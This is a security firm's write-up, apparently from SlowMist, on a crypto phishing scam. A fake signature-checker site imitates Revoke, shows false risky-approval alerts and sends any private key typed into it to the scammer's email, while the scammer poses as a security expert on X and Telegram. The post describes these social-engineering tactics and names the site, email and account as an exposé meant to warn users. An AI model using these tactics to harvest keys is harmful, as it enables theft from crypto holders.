Behind the Mask: SlowMist Reveals How a Fake Security Expert Tricked Crypto Users
Authors: Liz & Reborn
Editor: Liz
Background
Yesterday, a user contacted the SlowMist Security Team to ask how to revoke a signature and provided a screenshot showing a “risky approval” tied to their wallet address.
The user explained that there was one authorization in their wallet that simply couldn’t be revoked — clicking it multiple times had no effect — and the interface showed a warning. They also recalled authorizing a token swap operation years ago, which made the alert feel more credible. This didn’t seem like an unfounded alarm.
A Scam Disguised as Security
The SlowMist team checked the wallet using a blockchain explorer and Revoke, but found no record of the risky approval shown in the screenshot. Soon after, the user sent another screenshot — this time from a different tool. Upon comparison, we noticed that the wallet address in the two screenshots didn’t match. We then suggested the user share the tool’s URL and the relevant address. The user started to feel confused too — could both their addresses really have risky approvals?
We immediately analyzed the tool in question: Signature Checker (http://signature[.]land). Right on the homepage, we noticed it allowed users to input their private keys to “check for risks.” A wallet that wasn’t risky at all could become compromised if a private key was entered into such a site.
What’s more, the phishing site closely mimicked the visual design and logo of the legitimate Revoke platform. This could easily mislead users into thinking they’re on an official revocation site, lowering their guard and increasing the risk of falling for the scam. Below is the homepage of the real Revoke site:
Using the tool provided by the scammer, we tested both wallet addresses and, unsurprisingly, both were flagged as having risky approvals. But in the dark forest of Web3, skepticism is a survival instinct. We continued testing and found that pasting in any address would trigger the same warning — and the “approval time” was always very close to the time of the check. This created the illusion of urgency: it made users believe that revoking now might still save them.
We then tried entering a test private key, which resulted in a pop-up error: “invalid format.” However, our input was still transmitted.
Upon analyzing the front-end code of the phishing site, we discovered that it uses the EmailJS API to send the entered data — even calling Etherscan’s API to check if the wallet address is valid.
Here is the request to the EmailJS API, showing how any input — whether a wallet address or private key — is sent directly to the scammer’s inbox at abpulimali@gmail[.]com.
At this point, the scam was quite clear. According to the user, the scammer first contacted them via replies and DMs on X (formerly Twitter), claiming: “You signed a phishing signature,” then provided a link to the “revocation tool.”
From the chat logs, it’s evident the scammer was well-versed in social engineering: they deliberately listed the unknown tool first and the legitimate Revoke site second. Most users are more likely to click the first link. When the fake tool shows a risk alert, and Revoke doesn’t, they might begin to doubt the real tool instead.
The scammer even offered a step-by-step tutorial, instructing the user to paste their private key into the phishing site under the guise of “revoking interactions with malicious contracts.” Voice support was also offered — clearly a high-pressure sales pitch to get the user to take the bait.
Though the user began to feel uneasy and stopped cooperating, the scammer didn’t give up. To build credibility, they even suggested the user verify the risk with the SlowMist Security Team. For less security-savvy users, the fact that the scammer was “willing” to consult a well-known security company could create a false sense of trust. The scammer even mentioned @SlowMist_Team directly during the conversation, attempting to falsely associate themselves with SlowMist.
Fortunately, this user remained vigilant. Instead of entering their private key, they reached out to the SlowMist team to confirm the situation, ultimately avoiding asset loss.
Impersonating Multiple Security Experts
Further investigation revealed that the scammer had also impersonated ZachXBT, a well-known on-chain sleuth, by using his avatar on Telegram.
After the user refused to cooperate, the scammer switched tactics and pretended to be a SlowMist employee in an attempt to continue the scam.
We examined the scammer’s X account (@Titanspace3), which has 74,000 followers. Though registered in 2021, it only became active in 2024. The account primarily reposts updates from security researchers, companies, and media outlets, claiming to focus on blockchain security. It’s evident this is a purchased “aged” account — a common practice in the grey market. (For related content, see our earlier article.)
Based on the language style of early posts and other user-supplied clues, we suspect the scammer may be from Indonesia.
Currently, the account remains active on X, repeatedly leaving comments under the guise of “friendly reminders,” luring Web3 users to phishing links and tricking them into disclosing their private keys. Web3 anti-scam platform Scam Sniffer has already flagged the site as malicious.
Final Thoughts
From fabricating “risky approval” warnings to impersonating security company staff, these scams are becoming increasingly sophisticated — sometimes even wearing a semi-official disguise. What drives it all is a classic “fortune favors the bold” mindset: scammers believe that if their act looks professional enough, most users won’t verify the details and will instead be driven by urgency to comply.
That’s why we strongly urge all users to be wary of those “waving the flag of security while doing harm.” In the dark forest of blockchain, the only way to protect your assets is by maintaining zero trust and practicing continuous verification. No matter who the other party claims to be, or how urgent the situation may sound — stay calm, verify through official channels, and never share your private key or seed phrase with anyone.
The SlowMist Security Team will continue to expose such scams, helping users stay informed, increase awareness, and jointly safeguard the bottom line of Web3 security.
About SlowMist
SlowMist is a blockchain security firm established in January 2018. The firm was started by a team with over ten years of network security experience to become a global force. Our goal is to make the blockchain ecosystem as secure as possible for everyone. We are now a renowned international blockchain security firm that has worked on various well-known projects such as HashKey Exchange, OSL, MEEX, BGE, BTCBOX, Bitget, BHEX.SG, OKX, Binance, HTX, Amber Group, Crypto.com, etc.
SlowMist offers a variety of services that include but are not limited to security audits, threat information, defense deployment, security consultants, and other security-related services. We also offer AML (Anti-money laundering) software, MistEye (Security Monitoring) , SlowMist Hacked (Crypto hack archives), FireWall.x (Smart contract firewall) and other SaaS products. We have partnerships with domestic and international firms such as Akamai, BitDefender, RC², TianJi Partners, IPIP, etc. Our extensive work in cryptocurrency crime investigations has been cited by international organizations and government bodies, including the United Nations Security Council and the United Nations Office on Drugs and Crime.
By delivering a comprehensive security solution customized to individual projects, we can identify risks and prevent them from occurring. Our team was able to find and publish several high-risk blockchain security flaws. By doing so, we could spread awareness and raise the security standards in the blockchain ecosystem.
